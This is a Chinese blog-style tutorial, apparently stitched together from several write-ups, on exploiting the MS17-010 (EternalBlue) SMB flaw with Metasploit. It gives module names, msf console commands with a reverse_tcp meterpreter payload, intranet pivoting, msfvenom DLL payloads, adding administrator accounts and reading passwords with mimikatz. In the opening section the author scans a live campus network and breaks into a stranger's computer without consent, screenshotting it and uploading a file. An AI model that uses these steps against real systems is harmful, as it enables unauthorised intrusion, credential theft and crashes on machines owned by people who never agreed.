MSF利用ms17_010实验

该漏洞具有非常大的危害性，这个漏洞导致攻击者在目标系统上可以执行任意代，包括格式化电脑删除重要的内容。

当然漏洞非常的古老了，防范只需要打个补丁，再不济关闭445端口。

首先打开终端输入

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb >msfinstall &&chmod 755 msfinstall &&./msfinstall

安装成功就能指令msfconsole来使用了

MSF功能不止有利用ms17010，所以我们要选择对应的模块，其中利用到

auxiliary/scanner/smb/smb_ms17_010扫描工具模块

exploit/windows/smb/ms17_010_eternalblue利用工具模块

由于我实现环境是在校园网环境中，所以也就对校园网进行网段的扫描，我进入是我们的校园无线网络，连接不需要获得认证上网功能就可以实现漏洞攻击。

首先是查看自己IP

再利用扫描工具来对网段任何的B段进行扫描

扫出结果10.120.65.230IP存在漏洞风险，使用工具进行攻击

其中rhost为目标主机ip，lhost为自身监听ip

显示攻击成功了，这个时候，已经可以对被攻击者为所欲为了

打中后可以输入help来查看能执行的 *** 作

screenshot来进行截图屏幕

发现在打游戏，偷偷的不要打扰到别人哦，上传一个txt提示他存在漏洞需要修复打补丁了呢，实验成功，点到为止哦。

在内网渗透时，通常挂上代理后。在内网首先会打啵ms17-010。在实战中，使用msf的ms17-010模块，数次没有反d成功。基于此，到底如何成功利用ms17-010

在msf成功接收session之后，添加路由

然后使用ms17-010相关的模块进行探测是否存在该漏洞。

尝试利用

LHOST配置为公网IP

可以看到success。漏洞是可以利用的，但始终没有session。不知道什么原因。

参考资料： 利用公网Msf+MS17010跨网段攻击内网

笔者在本地搭建环境，也是同样的结果。尝试更改payload为

bind_tcp攻击者去连接，容易被防火墙和杀毒发现

可以成功生成session，但并不稳定，且在run的过程中非常容易导致本来的session died

在实际使用msf的ms17_010_eternalblue模块时，笔者观察到有几个弊端。

1.session 很容易died

2.ms17_010_eternalblue模块利用起来非常耗时

3.无法利用成功

有大佬推荐使用原始的fb.py。但配置起来感觉麻烦一些。

所以。笔者从i春秋上找到一个轻便的方程式漏洞利用工具。

参考资料： 萌新初试MS17-010方程式漏洞

工具使用起来很简单。只需要msfvenom生成一个x64或x86的dll文件，替换该工具下的x64.dll或x86.dll 。再依次点击Eternalblue、Doublepulsar 的Attack即可。在Attack的时候，调用x64.dll动态链接库，反d到公网IP。原理和fb.py一样。

笔者通过ew代理进内网后，在跳板机上上传了方程式漏洞利用工具、网安永恒之蓝检测工具。两者结合，威力巨大。成功利用ms17-010

对于windows server 2008 ，msfvenom生成x64.dll文件

msf配置

将该x64.dll替换到方程式利用工具下面。

只需要更换目标的IP，就可以获取session。

对于windows server 2003 ，msfvenom生成x86.dll文件

msf配置

进一步利用的一些命令

实际测试发现这种session非常稳定。不会轻易go die

实际测试server 2003的ms17-010时，有时候多次执行后msf就接收不到session，而且ms17-010利用时，脆弱的server 2003非常容易蓝屏。

所以笔者选择一种稳定可靠一些的办法。

先通过ms17_010_commend模块执行系统命令添加用户至管理员。再指定SMBPass和SMBUser来建立windows可访问命名管道[accessible named pipe]

参考资料 Metasploit 「永恒之蓝」两种模块的利弊

system的权限可以直接激活guest用户添加管理员组。

注意：使用ms17_010_psexec需要指定管理员的用户名、密码，否则没有session

同样的 *** 作，载入mimikatz，读取管理员密码。

0x01 实验环境

攻击机：kali linux

ip:10.10.10.131

目标机：windows 2008 R2

ip:10.10.10.132

0x02 配置exploit

msf >use exploit/windows/smb/ms17_010_eternalblue

msf exploit(ms17_010_eternalblue) >set rhost 10.10.10.132

rhost =>10.10.10.132

查看选项

msf exploit(ms17_010_eternalblue) >show options

设置目标机的IP，其他选项默认就可以；

注意：选项中说明了此exploit对应的目标系统，所以并不是具有该漏洞的系统都能利用此exploit；

0x03 配置payload

payload只需要配置监听返回会话的IP；

msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp

payload =>windows/x64/meterpreter/reverse_tcp

msf exploit(ms17_010_eternalblue) >set lhost 10.10.10.131

lhost =>10.10.10.131

0x04 开始攻击

警告：攻击过程可能导致目标系统宕机重启，谨慎 *** 作！

msf exploit(ms17_010_eternalblue) >exploit

成功获得session。

shell 进入主机 *** 作

---